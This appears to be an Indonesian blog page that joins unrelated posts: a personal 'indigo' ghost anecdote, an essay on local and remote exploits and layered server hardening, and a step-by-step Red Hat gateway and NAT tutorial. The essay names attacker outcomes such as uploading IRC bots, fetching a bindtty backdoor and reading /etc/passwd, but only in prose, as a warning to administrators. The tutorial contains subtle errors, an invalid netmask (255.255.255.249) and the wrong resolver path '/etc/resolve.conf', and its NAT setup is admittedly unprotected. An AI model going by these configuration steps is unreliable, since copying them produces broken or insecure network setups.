Whatever ada orang yang bilang gw indigo ato sebagainya.. Hm.. Sebenernya apa sih indigo itu..??

http://en.wikipedia.org/wiki/Indigo

Mungkin dalam keluarga gw, gw termasuk yg paling ’peka’.. Sering banget gw ngelihat

something yang ga nampak gtu.. Ga cuma liat, kadang klo ad yg bakal ngeganggu gw bisa ngerasa.. Usut punya usut.. I got this ‘power’ from eyang buyut gw, trus ke my MOM, baru turun ke gw..

Peristiwa terakhir yang unik n aneh waktu gw d rumah temen gw, lebih tepatnya di atap rumah

Waktu itu gw nginep t4 temen gw, karna gw kagak bisa tidur, yah gw mutusin

bwt ngobrol2 d atas atap aj.. Sekitar  jam 4an pagi, gw tiba2 liat ada asap tipis keluar dari badan gw.. Pertama gw pikir itu embuh ato apa gtu.. Tapi gw tanya temen gw, doi kgak liat apa d badan gw..

Wuih.. So scary..

Gw jg kagak mau ambil pusing kayak gtuan.. Biar aj itu rahasia alam.. 

Jika diamati berita seputar keamanan internet, maka banyak sekali informasi tentang bug/hole ataupun exploit yang beredar di Internet. Semuanya hadir dengan informasi yang cukup detail dan membuat SysAdmin harus terus berlomba dengan para Cracker/Hacker dalam mengamankan server yang dikelola.

Jika diamati banyak sekali cara yang dilakukan oleh cracker untuk masuk ke sebuah komputer. Cara yang tercepat dan paling mudah serta yang dulu paling sering dilakukan adalah dengan menggunakan exploit yang sudah tersedia di internet. Instant sekali. Kita cukup cari target, scanning, compile exploit, execute exploit dan hapalkan dasar-dasar perintah OS yang digunakan, so anda sudah memiliki server tersebut.

Secara garis besar exploit yang dipergunakan oleh cracker untuk masuk ke sebuah server dapat dibagi dalam dua bagian yaitu :

1. Lokal Exploit
Yang dimaksud dengan lokal exploit adalah exploit yang hanya dapat diexecute pada komputer itu sendiri. Artinya exploit ini tidak dapat diexecute dari komputer pribadi untuk memasuki komputer lain. Biasanya lokal exploit diexecute dan akan bisa menguasai sistem dengan memanfaatkan kelemahan yang ada pada sistem operasi ataupun pada aplikasi yang dijalankan oleh server.

2. Remote Exploit
Remote exploit adalah exploit yang dapat diexecute dari jarak jauh. Artinya dengan menggunakan exploit ini, maka anda dapat masuk ke komputer lain melalui komputer pribadi dengan memanfaatkan kelemahan aplikasi yang berjalan di komputer lain tersebut. Bagi sebagian orang lebih menyenangkan untuk menggunakan remote exploit daripada lokal exploit karena biasanya remote exploit juga bisa menjadi lokal exploit dan tidak berlaku sebaliknya.

Terlepas dari itu semua, sebenarnya ada resiko keamanan yang tetap dimiliki sebuah komputer ketika telah berisikan Sistem Operasi beserta aplikasi yang digunakan. Sebagai contoh, ketika kita telah menginstall sebuah server dengan Sistem Operasi Linux Redhat 7.0 dengan berbagai aplikasi misalkan apache web server, database mysql dan PHP. Maka Anda sebagai SysAdmin secara ’sadar’ telah membuka diri (komputer server) kepada orang orang lain agar dapat berkomunikasi dengannya. Ada satu pameo yang saya ingat, bahwa tidak ada satupun komputer yang aman ketika sudah terkoneksi dengan sebuah jaringan. Apalagi jika jaringannya adalah internet!. Dan ini juga berlaku untuk server yang telah kita koneksikan ke internet.

Dari contoh di atas, ada beberapa hal yang menjadi catatan penting bagi saya dan (mungkin) ini akan menjadi pedoman penting bagi SysAdmin untuk tahu tingkat resiko keamanan pada server yang ia kelola. Misalkan saja informasi server yang dikelola seperti tercantum di bawah ini :

Sistem Operasi yang digunakan adalah Redhat Linux 7.0
Aplikasi Web Server yang digunakan adalah Apache Web Server (Misalkan saja versi 1.3.20)
Database Mysql versi 3.2.23
PHP Engine versi 4.1.x
Aplikasi web base yang menggunakan PHP dan MySQL.
Jika digambarkan dalam bentuk diagram pohon kurang lebihnya adalah sebagai berikut :

Sistem Operasi [Level 1] :
+ Apache [Level 2]
+ Engine PHP [Level 3]
+ Aplikasi Web Based/Scripting PHP [Level 4]
+ MySQL [Level 2]

Dari informasi spesifikasi diatas maka dapat diketahui tingkat keamanan komputer tersebut :

1. Keamanan pada Sistem Operasi (Versi Kernel yang digunakan) -Tingkat Keamanan Level 1-
Jantung dari sistem operasi linux adalah kernel. Kesalahan pemrograman yang terjadi pada kernel akan berakibat fatal dengan tidak berjalannya sistem secara maksimal. Untuk hal ini coba cari tahu kernel yang digunakan versi berapa dan apakah memiliki bug/hole?. Jika memang terbukti memiliki bug/hole, maka sebaiknya secepatnya di upgrade dengan versi yang lebih tinggi. Biasanya pada level ini lokal exploit yang paling sering berperan untuk mendapatkan akses ke sebuah sistem, walaupun tidak menutup kemungkinan bagi remote exploit untuk mendapatkannya.

2. Keamanan pada Aplikasi Web Server (Versi Apache yang digunakan) -Tingkat Keamanan Level 2-
Apache adalah salah satu aplikasi web server yang banyak digunakan di dunia. Pada level ini yang harus anda perhatikan adalah versi apache yang digunakan. Jika memang terbukti versi ini memiliki bug/hole, segeralah upgrade apache yang anda miliki. Sesuaikan lagi konfigurasi apache dengan keinginan anda. Matikan module-module apache yang memang tidak digunakan. Ganti username dan group aplikasi ini ke user yang tidak memiliki akses shell seperti nobody. Jangan pasrahkan konfigurasi apache dengan konfigurasi default dari proses instalasi. Pada level ini exploit yang paling sering dipergunakan adalah remote exploit, karena pada level ini aplikasi apache terbuka pada port 80, sehingga ada kemungkinan untuk dibobol/disusupi dari jarak jauh.

3. Keamanan pada Aplikasi MySQL (versi MySQL yang digunakan) -Tingkat Keamanan Level 2-
MySQL adalah salah satu database SQL yang cukup populer dan banyak dipergunakan di internet. Integrasinya yang simple, clean and fast dengan PHP membuktikan salah satu kelebihan PHP untuk menguasai pasar aplikasi berbasis web based. Tidak berbeda jauh dengan Apache dan PHP, maka hal terpenting yang harus dilihat disini adalah versi MySQL yang anda gunakan. Pastikan bahwa pada versi ini tidak memiliki bug/hole. Hal lainnya yang perlu menjadi perhatian adalah segera merubah password default administrator database MySQL. Default instalasi MySQL memberikan hak akses kepada user root dengan priveleges penuh dan tanpa password!. Bayangkan jika anda lalai untuk merubahnya?

Jika database ini terkoneksi dengan internet/web, buatlah user MySQL dengan priveleges yang berbeda dengan priveleges administrator (don’t ask me how to do this, please ask to uncle google . Database MySQL membuka port 3306. Sehingga ada kemungkinan untuk di exploitasi dengan menggunakan remote exploit ataupun lokal exploit.

Secara umum pada level 2 yang harus diperhatikan bahwa semua exploit yang beredar di internet sangat banyak sekali yang memanfaatkan bug/hole pada level aplikasi. Anda dapat mengikuti berita keamanan aplikasi yang anda gunakan melalui situs-situs resmi aplikasi tersebut. Disini dibutuhkan kecermatan dan kecepatan anda dalam mengikuti informasi tentang keamanan internet. Jangan pernah lupa untuk mengupgrade, jika memang situs resmi aplikasi tersebut menyarankannya. Jadi pada level ini salah satu cara untuk menghindari berperang dengan cracker adalah dengan selalu mengikuti berita/news untuk aplikasi yang anda jalankan. Lengah sedikit, bisa jadi server anda yang menjadi target .

4. Keamanan pada Aplikasi PHP (Versi PHP yang digunakan) -Tingkat Keamanan Level 3-
PHP adalah sebuah bahasa pemrograman yang saat ini banyak sekali dipergunakan di internet. banyak sekali situs komersial yang menggunakan PHP agar situsnya terlihat dinamis dan lebih interaktif. Namun pada level 2, PHP yang dibicarakan disini bukan pada kode pemrograman (scripting) yang telah dilakukan, namun pada engine PHP yang digunakan. Sama seperti pada apache di level ini harus diperhatikan apakah versi PHP yang digunakan memiliki bug/hole. Jika memang terbukti segeralah uprade versi PHP tersebut. Selain itu jangan serahkan konfigurasi PHP pada hasil default instalasi. Rubahlah beberapa variabelnya sesuai dengan keinginan anda. Beberapa hal yang terpenting pada konfigurasi PHP antara lain adalah SAFE_MODE dan REGISTER_GLOBAL. Cobalah bertanya lebih lanjut tentang konfigurasi PHP pada paman google . AFAIK, engine PHP tidak dapat diexploitasi dengan remote exploit karena engine PHP tidak pernah membuka diri pada port tertentu. Jadi kalaupun ingin mengexploitasi engine! PHP hanya dapat menggunakan lokal exploit. CMIIW.

5. Keamanan pada Aplikasi Web Based yang berjalan -Tingkat Keamanan Level 4-
Membangun sebuah aplikasi yang berbasis web adalah hal yang menyenangkan. Bagaimana tidak?, dengan membangun aplikasi berbasis web, maka aplikasi tersebut akan berjalan pada berbagai platform sistem operasi, selain itu untuk pengembangan lebih lanjut juga akan mudah sekali. Namun dibalik itu semua, ternyata aplikasi berbasis web juga menyimpan sebuah bahaya yang sangat besar bagi keamanan komputer. Tercatat pada memori saya beberapa hal yang dapat dilakukan hanya karena kesalahan scripting aplikasi web based, antara lain :

Mengupload file seperti eggdrop, psybnc, dll.
Mendownload backdoor seperti bindtty, yang berakibat cracker akan memiliki akses shell dan selanjutnya tinggal mencari lokal exploit.
Mengacak-acak database MySQL
Mengintip nama-nama user yang berada pada /etc/passwd
Mendefaced website
Sehebat apapun proteksi sebuah sistem tidak dapat menutupi kelemahan yang ada pada aplikasi web based. Salah satu contoh konkret yang terlihat sampai dengan saat ini adalah bobolnya Situs KPU karena bug/hole SQL Injection. Dani Firman Syah a.k.a xnuxer berhasil dengan baik memanfaatkan kesalahan scripting yang dilakukan oleh Tim IT KPU, sehingga dia berhasil merubah nama-nama partai yang ada dalam database.

Kelemahan web based biasanya bisa terjadi karena :

Kurang mampu dalam menganalis algoritma pemrograman web based.
Penggunaan fungsi-fungsi pemrograman web based yang tidak sesuai dengan tempatnya.
Ketidakhati-hatian dalam menggunakan CMS yang sudah jadi seperti PHP-Nuke, Post-Nuke, Mambo, dll.
Tidak adanya perbedaan method POST dan GET pada aplikasi web based yang digunakan
Masih banyak lagi yang lain
Saran saya untuk level ini (jika anda membuat sendiri aplikasi web based). Coba dan cobalah terus berlatih untuk membuat sebuah algoritma pemrograman web yang ‘bersih’, ‘rapi’, ‘teratur’ dan sesuai dengan fungsinya. Jangan pernah merasa bahwa aplikasi yang anda buat adalah aplikasi yang handal dan tidak bisa ditembus orang lain. Kalau perlu mintalah tolong kepada orang lain untuk mengecek algoritma pemrograman anda dan mengetest kode pemrograman anda. Jangan publish aplikasi web based tersebut jika anda belum yakin dengan algoritma yang telah anda susun.

Jika menggunakan CMS yang sudah jadi, cobalah ikuti berita bug/hole yang dimilikinya. Sampai dengan saat ini seperti PHP-Nuke sudah sering sekali memiliki kelemahan pada bug/hole SQL injection. Kelemahan yang ada pada PHP-Nuke ini dimanfaatkan beberapa gelintir orang untuk membuat remote exploitnya yang berbasis pada pemrograman perl ataupun PHP. Untuk hal ini saya cuma bisa menyarankan jangan pernah anda lengah dengan menggunakan versi CMS yang ternyata memiliki bug/hole

Pertama yang harus di lakukan adalah mensetting mgw(main gateway) supaya bisa connect ke internet

—- More —-

Sebelum Mensetting :
1.Minta IP public ke ISP lengkap dengan netmask,broadcast dan dns nya
misalnya :
RANGE : 202.159.121.0/29
IP : 202.159.121.2
GATEWAY : 202.159.121.1
Nemast : 255.255.255.248
broadcast : 202.159.121.7
DNS1 : 202.159.0.10
DNS2 : 202.159.0.20
berarti kita mendapatkan ip 5 buah dari 202.159.121.2 - 202.159.121.6

2.Menentukan IP local yang akan kita gunakan buat client

Setting IP MGW :
1.[root@mgw cachak]$ vi /etc/sysconfig/network
lalu isi dengan :

NETWORKING=yes
HOSTNAME=mgw.domain.com
GATEWAY=202.159.121.1

lalu simpen dengan menekan :wq

2.Menconfigurasi IP eth0(default)

[root@mgw root]$ vi /etc/sysconfig/network-scripts/ifcfg-eth0
lalu isi dengan :

DEVICE=eth0
BOOTPROTO=static
IPADDR=202.159.121.2
BROADCAST=202.159.121.7
NETMASK=255.255.255.249
ONBOOT=yes
USERCTL=no

lalu simpen dengan menekan :wq

3.Setting dns resolve

[root@mgw root]$ vi /etc/resolve.conf
lalu isi dengan nameserver dari isp kita tadi :

nameserver 202.159.0.10
nameserver 202.159.0.20

lalu simpen dengan menekan :wq

4.Setting ip_forwarding

[root@mgw cachak]$ vi /etc/sysctl.conf

rubah net.ipv4.ip_forward = 0 menjadi net.ipv4.ip_forward = 1
atau kalau gak ada net.ipv4.ip_forward = 0 tambahin net.ipv4.ip_forward = 1

simpen dengan menekan :wq

5.restart network
[root@mgw cachak]$ /etc/init.d/network restart
Shutting down interface eth0: [ OK ]
Shutting down loopback interface: [ OK ]
Disabling IPv4 packet forwarding: [ OK ]
Setting network parameters: [ OK ]
Bringing up loopback interface: [ OK ]
Bringing up interface eth0: [ OK ]

[root@www root]#chkconfig –level 2345 network on
[root@www root]#

6.testing dengan ngeping ke default gateway 202.159.121.1

[root@mgw cachak]$ ping 202.159.121.1
PING 202.159.121.1 (202.159.121.1) 56(84) bytes of data.
64 bytes from 202.159.121.1: icmp_seq=1 ttl=63 time=0.356 ms
64 bytes from 202.159.121.1: icmp_seq=2 ttl=63 time=0.269 ms
64 bytes from 202.159.121.1: icmp_seq=3 ttl=63 time=0.267 ms
64 bytes from 202.159.121.1: icmp_seq=4 ttl=63 time=0.268 ms

— 202.159.121.1 ping statistics —
4 packets transmitted, 4 received, 0% packet loss, time 2997ms
rtt min/avg/max/mdev = 0.267/0.290/0.356/0.038 ms

7.testing untuk ngeping google.com untuk ngecek dns nya
kalau muncul :
PING google.com (216.239.39.99) 56(84) bytes of data.
berarti dns kita untuk mgw dah bekerja, tapi kalau muncul :
ping: unknown host google.com
berarti dns yang kita isikan di /etc/resolve.conf masih salah,silahkan cek lagi ke ISP nya

nah bereskan sudah setting IP untuk mgw nya
supaya mgw ini bisa sekaligus di gunakan sebagai ns server oleh client maka harus di install daemon bind atau daemon nameserver yang lain
ataukalau sudah ada tinggal idupin Bind nya

[root@www root]# /etc/init.d/named restart
Stopping named: [ OK ]
Starting named: [ OK ]
[root@www root]#chkconfig –level 2345 named on
[root@www root]#

misalnya ip ke client adalah :
192.168.0.1/24
IP : 192.168.0.1
netmask : 255.255.255.0
broadcast : 192.168.0.255
RANGE IP CLIENT : 192.168.0.2-192.168.0.254

Setting ip untuk eth1 (yang ke client)
1.memberi IP 192.168.0.1 di eth1
[root@mgw cachak]$ vi /etc/sysconfig/network-scripts/ifcfg-eth1
lalu isi dengan :

DEVICE=eth1
BOOTPROTO=static
IPADDR=192.168.0.1
NETMASK=255.255.255.0
BROADCAST=192.168.0.255
ONBOOT=yes
USERCTL=no

lalu simpen dengan menekan :wq

2.Restart networknya

[root@mgw root]$ /etc/init.d/network restart
Shutting down interface eth0: [ OK ]
Shutting down interface eth1: [ OK ]
Shutting down loopback interface: [ OK ]
Disabling IPv4 packet forwarding: [ OK ]
Setting network parameters: [ OK ]
Bringing up loopback interface: [ OK ]
Bringing up interface eth0: [ OK ]
Bringing up interface eth1: [ OK ]

3.Testing dengan cara ping ip eth1
[root@mgw cachak]$ ping 192.168.0.1
PING 192.168.0.1 (192.168.0.1) 56(84) bytes of data.
64 bytes from 192.168.0.1: icmp_seq=1 ttl=63 time=0.356 ms
64 bytes from 192.168.0.1: icmp_seq=2 ttl=63 time=0.269 ms
64 bytes from 192.168.0.1: icmp_seq=3 ttl=63 time=0.267 ms
64 bytes from 192.168.0.1: icmp_seq=4 ttl=63 time=0.268 ms

— 192.168.0.1 ping statistics —
4 packets transmitted, 4 received, 0% packet loss, time 2997ms
rtt min/avg/max/mdev = 0.267/0.290/0.356/0.038 ms

Tinggal Setting IP computer client dengan ketentuan di bawah ini :

IP : 192.168.0.2 - 192.168.0.254
GATEWAY : 192.168.0.1
NETMASK : 255.255.255.0
BROADCAST : 192.168.0.255
NAMESERVER : 192.168.0.1

misal :

Client01
===============================
IP : 192.168.0.2
GATEWAY : 192.168.0.1
NETMASK : 255.255.255.0
BROADCAST : 192.168.0.255
NAMESERVER : 192.168.0.1

Client02
===============================
IP : 192.168.0.3
GATEWAY : 192.168.0.1
NETMASK : 255.255.255.0
BROADCAST : 192.168.0.255
NAMESERVER : 192.168.0.1

dan seterusnya sesuai banyaknya client,yang berubah hanya IP
untuk client windows maka setting IP di bagian Start Menu/Setting/Control Panel/Network

setelah di setting ip client, maka coba ping ke 192.168.0.1 dari client,kalau berhasil berarti client dan MGW nya sudah tersambung.

Setting MGW supaya client bisa internat dengan menggunakan NAT

1.Matikan iptablesnya

[root@mgw root]# /etc/init.d/iptables stop
Flushing all chains: [ OK ]
Removing user defined chains: [ OK ]
Resetting built-in chains to the default ACCEPT policy: [ OK ]
[root@mgw root]#

2.Tambahkan iptables untuk Source NAt sesuai dengan ip di eth0
[root@mgw root]# /sbin/iptables -t nat -A POSTROUTING -o eth0 -s 192.168.0.0/24 -j SNAT –to-source 202.159.121.2
[root@mgw root]# /sbin/iptables-save > /etc/sysconfig/iptables
[root@mgw root]# /etc/init.d/iptables restart
Flushing all current rules and user defined chains: [ OK ]
Clearing all current rules and user defined chains: [ OK ]
Applying iptables firewall rules: [ OK ]
[root@mgw root]# iptables-save

SNAT sudah,SNAT disini standar sekali dan gak ada proteksi
untuk mengetest nya kita browser di client lalau buka google.com, kalau jalan berati kita sudah berhasil